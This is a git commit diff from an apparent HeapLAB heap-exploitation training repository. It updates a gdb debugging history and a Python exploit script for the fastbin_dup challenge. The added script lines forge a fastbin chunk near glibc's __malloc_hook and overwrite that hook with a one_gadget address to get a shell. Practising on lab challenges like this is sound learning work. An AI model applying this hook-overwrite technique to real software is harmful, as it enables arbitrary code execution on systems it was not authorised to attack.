From 93f5247d9c37732846b0d88136b2ce1908b361be Mon Sep 17 00:00:00 2001
From: Brett Weiland <techcrazybsw@gmail.com>
Date: Mon, 4 Jan 2021 20:25:35 -0600
Subject: 	modified:   HeapLAB/challenge-fastbin_dup/.gdb_history        
 modified:   HeapLAB/challenge-fastbin_dup/bruh.py

---
 HeapLAB/challenge-fastbin_dup/.gdb_history | 130 ++++++++++++++---------------
 HeapLAB/challenge-fastbin_dup/bruh.py      |   7 +-
 2 files changed, 71 insertions(+), 66 deletions(-)

(limited to 'HeapLAB/challenge-fastbin_dup')

diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
index 4933f78..7bd5bb8 100644
--- a/HeapLAB/challenge-fastbin_dup/.gdb_history
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -1,68 +1,3 @@
-c
-x 0x7f4854db6b40
-c
-x 0x7f4854db6b40
-x main_arena
-x &main_arena
-x &__malloc_hook
-x main_arena.top
-db main_arena.top
-c
-c
-c
-q
-print __malloc_hook
-print __malloc_hook 
-fastbins
-c
-fastbins
-c
-vis_heap_chunks 
-c
-fastbins
-r
-c
-fastbins
-print main_arena
-vis_heap
-c
-fastbins
-fastbins
-c
-fastbins
-r
-c
- quit
-db main_arena
-db &main_arena.fastbinsY 
-q
-r
-c
-c
-fastbins
-print &main_arena
-print main_arena
-c
-print main_arena
-db main_arena
-db &main_arena
-db &main_arena/100
-db &main_arena 100
-db &main_arena 1000
-q
-db main_arena.bins
-db &main_arena.fastbinsY 
-run
-c
-c
-q
-r
-c
-fastbins
-c
-fastbins
-c
-fastbins
 r
 c
 c
@@ -254,3 +189,68 @@ db 0x7f265fd4cb2d-1
 db 
 c
 db &__malloc_hook-(16) (16*8)
+exit
+quit
+x rsp
+print $rsp+50
+print $rsp
+print $*rsp
+print $rsp
+print (void*)$rsp
+print (void*)$rsp+50
+print (void*)*$rsp+50
+print (void*)&$rsp+50
+x 0x7ffc1644e71a
+print (void*)&$rsp+50
+print (void*)$rsp+50
+print (void*)$rsp+0x50
+x 0x7ffc1644e738
+quit
+q
+print main_arena
+find_fake_fast &__malloc_hook
+q
+quit
+fastbins
+find_fake_fast &__malloc_hook 
+print (void*)&__malloc_hook
+q
+x &__malloc_hook
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (17*8)
+db &__malloc_hook-(16) (18*8)
+db &__malloc_hook-(16) (19*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+find_fake_fast &__malloc_hook
+db 0x7fd4a6cf7b2d-(16) (20*8)
+q
+print main_arena
+vis_heap_chunks 
+db 0x7f37a78ddb7d-(16) (20*8)
+db 0x7f37a78ddb7d-(32) (20*8)
+quit
+db 0x7f37a78ddb7d-(32) (20*8)
+db main_arena.top-(32) (20*8)
+search 0x7f323f6f0fa1
+search 0x7f323f6f0fa1
+search --help
+search --qword 0x7f323f6f0fa1
+search -p 0x7f323f6f0fa1
+search -p 0x0fa1
+search -p 0xa10f
+search -hexp 0x7f323f6f0fa1
+search --hex 0x7f323f6f0fa1
+search --hex 7f323f6f0fa1
+search --hex -8 7f323f6f0fa1
+search -8 --hex 7f323f6f0fa1
+search -t qword --hex 7f323f6f0fa1
+search -t qword -x 7f323f6f0fa1
+search -t qword -x 0x7f323f6f0fa1
+search -t qword 0x7f323f6f0fa1
+quit
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 56b0c71..df54957 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -74,9 +74,14 @@ malloc(119, 'sdfg')
 
 #8 * 9
 
-payload_loc = libc.sym.__malloc_hook - 35
+payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
 malloc(119, p64(0)*9 + p64(payload_loc))
 
+#we now have things in place and shit
+onegadget = libc.address + 0xe1fa1
+malloc(72, p64(0)*(35) + p64(onegadget))
+
+print("onegadget: {}".format(hex(onegadget)))
 print("top chunk addr: {}".format(hex(payload_loc)))
 
 # =============================================================================
-- 
cgit v1.2.3